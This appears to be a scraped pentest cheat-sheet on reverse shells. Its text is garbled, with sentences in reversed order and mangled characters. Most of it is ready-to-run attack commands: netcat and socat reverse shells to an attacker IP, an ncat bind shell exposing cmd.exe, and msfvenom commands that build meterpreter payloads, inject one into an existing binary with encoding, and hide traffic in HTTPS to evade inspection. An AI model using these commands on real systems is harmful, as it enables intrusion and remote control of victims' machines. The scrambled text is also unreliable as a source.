If you are on a pentestjob you might not want to communicate unencrypted.īind ncat -exec cmd.exe -allow 192.168.1.101 -vnl 5555 -ssl One feature it has that netcat does not have is encryption. Ncat is a better and more modern version of netcat. Listener (Server) socat file:`tty`,raw,echo=0 tcp-listen:4444Ĭallback (Victim/Client) socat tcp-connect:10.10.10.10:4444 exec:sh,pty,stderr,setsid,sigint,sane Upgrade Netcat shell to an interactive: Socat # Without -e flag rm -f /tmp/p mknod /tmp/p p & nc ATTACKING-IP 4444 0/tmp/p With -e flag nc -e /bin/sh ATTACKING-IP 80
Inject payload into binary # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe Staged payload # msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe Non-staged payload # msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections. It makes the meterpreter-traffic look normal. Set payload windows/meterpreter/reverse_tcp Standard meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe This can be caught with metasploit multi-handler but not with netcat. First it sends some parts of it and sets up the connection, and then it sends some more. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. This can be caught with metasploit multi-handler. A non-staged shell is sent over in one block. There is an important difference between non-staged and staged payload. Many of the ones listed below comes from this cheat-sheet: This is s great collection of different types of reverse shells and webshells.
0 kommentar(er)
